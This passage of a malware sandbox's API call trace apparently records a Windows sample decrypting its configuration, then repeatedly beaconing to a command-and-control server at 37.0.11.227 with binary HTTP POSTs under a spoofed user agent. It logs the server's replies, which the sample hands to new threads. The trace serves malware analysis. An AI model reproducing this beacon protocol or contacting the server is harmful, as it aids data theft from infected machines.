[0207.760] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0207.760] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0207.761] GetProcessHeap () returned 0x690000 [0207.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0207.761] GetProcessHeap () returned 0x690000 [0207.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0207.761] GetProcessHeap () returned 0x690000 [0207.761] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0207.762] GetProcessHeap () returned 0x690000 [0207.762] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0207.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.763] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.767] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.767] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0207.775] GetProcessHeap () returned 0x690000 [0207.775] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0207.775] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.776] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0207.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.777] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.778] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.778] GetProcessHeap () returned 0x690000 [0207.778] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0207.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.779] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0207.782] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.782] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0207.783] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.784] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0207.784] GetProcessHeap () returned 0x690000 [0207.784] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0207.784] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.785] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0207.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.786] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0207.787] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.788] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0207.789] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.789] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0207.789] GetProcessHeap () returned 0x690000 [0207.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0207.789] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0207.789] GetProcessHeap () returned 0x690000 [0207.789] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab470 [0207.789] socket (af=2, type=1, protocol=6) returned 0x4a0 [0207.790] connect (s=0x4a0, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0207.814] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0207.814] GetProcessHeap () returned 0x690000 [0207.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0207.814] GetProcessHeap () returned 0x690000 [0207.814] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0207.815] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0207.816] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0207.816] GetProcessHeap () returned 0x690000 [0207.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0207.816] GetProcessHeap () returned 0x690000 [0207.816] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0207.816] GetProcessHeap () returned 0x690000 [0207.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0207.816] GetProcessHeap () returned 0x690000 [0207.816] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0207.817] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0207.818] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0207.818] GetProcessHeap () returned 0x690000 [0207.818] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0207.818] GetProcessHeap () returned 0x690000 [0207.818] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0207.819] send (s=0x4a0, buf=0x6ab500*, len=242, flags=0) returned 242 [0207.819] send (s=0x4a0, buf=0x6aba40*, len=159, flags=0) returned 159 [0207.819] GetProcessHeap () returned 0x690000 [0207.819] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0207.819] recv (in: s=0x4a0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0207.915] GetProcessHeap () returned 0x690000 [0207.915] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0207.915] GetProcessHeap () returned 0x690000 [0207.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0207.916] GetProcessHeap () returned 0x690000 [0207.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0207.916] GetProcessHeap () returned 0x690000 [0207.916] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af078 | out: hHeap=0x690000) returned 1 [0207.916] closesocket (s=0x4a0) returned 0 [0207.917] GetProcessHeap () returned 0x690000 [0207.917] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab470 | out: hHeap=0x690000) returned 1 [0207.917] GetProcessHeap () returned 0x690000 [0207.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0207.918] GetProcessHeap () returned 0x690000 [0207.918] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0207.918] GetProcessHeap () returned 0x690000 [0207.919] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0207.919] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x8e0) returned 0x4a0 [0207.922] Sleep (dwMilliseconds=0xea60) [0207.924] GetProcessHeap () returned 0x690000 [0207.924] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0207.925] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.925] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.933] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.933] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0207.942] GetProcessHeap () returned 0x690000 [0207.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0207.942] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.943] CryptImportKey (in: hProv=0x6af188, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0207.943] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.944] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.944] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.945] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.945] GetProcessHeap () returned 0x690000 [0207.945] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0207.948] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.949] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0207.949] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.950] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0207.950] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.951] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0207.951] GetProcessHeap () returned 0x690000 [0207.951] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0207.951] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.952] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0207.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.952] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0207.953] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.957] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0207.958] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.958] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0207.958] GetProcessHeap () returned 0x690000 [0207.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0207.958] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0207.958] GetProcessHeap () returned 0x690000 [0207.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0207.959] GetProcessHeap () returned 0x690000 [0207.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0207.959] GetProcessHeap () returned 0x690000 [0207.959] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0207.959] GetProcessHeap () returned 0x690000 [0207.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0207.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.961] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0207.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.965] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0207.982] GetProcessHeap () returned 0x690000 [0207.982] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0207.983] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.983] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0207.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.985] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0207.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.986] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0207.986] GetProcessHeap () returned 0x690000 [0207.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0207.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.988] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0207.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.992] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0207.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0207.993] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0207.993] GetProcessHeap () returned 0x690000 [0207.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0207.994] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.994] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0207.995] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.995] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0207.996] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.996] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0207.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0207.998] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0207.998] GetProcessHeap () returned 0x690000 [0207.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0207.998] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0207.998] GetProcessHeap () returned 0x690000 [0207.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4a0 [0207.998] socket (af=2, type=1, protocol=6) returned 0x4a4 [0207.999] connect (s=0x4a4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0208.021] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0208.021] GetProcessHeap () returned 0x690000 [0208.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af100 [0208.021] GetProcessHeap () returned 0x690000 [0208.021] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b57a0 [0208.026] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.028] wvsprintfA (in: param_1=0x6b57a0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0208.028] GetProcessHeap () returned 0x690000 [0208.028] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af500 [0208.028] GetProcessHeap () returned 0x690000 [0208.028] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.028] GetProcessHeap () returned 0x690000 [0208.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0208.029] GetProcessHeap () returned 0x690000 [0208.029] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b57a0 [0208.029] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0208.030] wvsprintfA (in: param_1=0x6b57a0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0208.030] GetProcessHeap () returned 0x690000 [0208.030] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ab500 [0208.030] GetProcessHeap () returned 0x690000 [0208.030] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b57a0 | out: hHeap=0x690000) returned 1 [0208.030] send (s=0x4a4, buf=0x6ab500*, len=242, flags=0) returned 242 [0208.031] send (s=0x4a4, buf=0x6aba40*, len=159, flags=0) returned 159 [0208.031] GetProcessHeap () returned 0x690000 [0208.031] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0208.031] recv (in: s=0x4a4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0208.106] GetProcessHeap () returned 0x690000 [0208.106] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab500 | out: hHeap=0x690000) returned 1 [0208.106] GetProcessHeap () returned 0x690000 [0208.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0208.107] GetProcessHeap () returned 0x690000 [0208.107] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af500 | out: hHeap=0x690000) returned 1 [0208.107] GetProcessHeap () returned 0x690000 [0208.108] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af100 | out: hHeap=0x690000) returned 1 [0208.108] closesocket (s=0x4a4) returned 0 [0208.108] GetProcessHeap () returned 0x690000 [0208.108] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4a0 | out: hHeap=0x690000) returned 1 [0208.108] GetProcessHeap () returned 0x690000 [0208.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0208.109] GetProcessHeap () returned 0x690000 [0208.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0208.109] GetProcessHeap () returned 0x690000 [0208.109] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0208.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1334) returned 0x4a4 [0208.115] Sleep (dwMilliseconds=0xea60) [0208.118] GetProcessHeap () returned 0x690000 [0208.118] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0208.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.119] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0208.129] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.130] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0208.140] GetProcessHeap () returned 0x690000 [0208.140] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0208.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.141] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0208.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.142] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0208.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.143] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0208.143] GetProcessHeap () returned 0x690000 [0208.144] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0208.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.145] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0208.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.150] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0208.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.151] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0208.151] GetProcessHeap () returned 0x690000 [0208.151] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0208.152] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.152] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0208.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.153] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0208.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.154] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0208.156] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0208.156] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0208.156] GetProcessHeap () returned 0x690000 [0208.156] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0208.156] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0208.157] GetProcessHeap () returned 0x690000 [0208.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0208.157] GetProcessHeap () returned 0x690000 [0208.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0208.158] GetProcessHeap () returned 0x690000 [0208.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0208.158] GetProcessHeap () returned 0x690000 [0208.158] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0208.161] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0208.161] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, 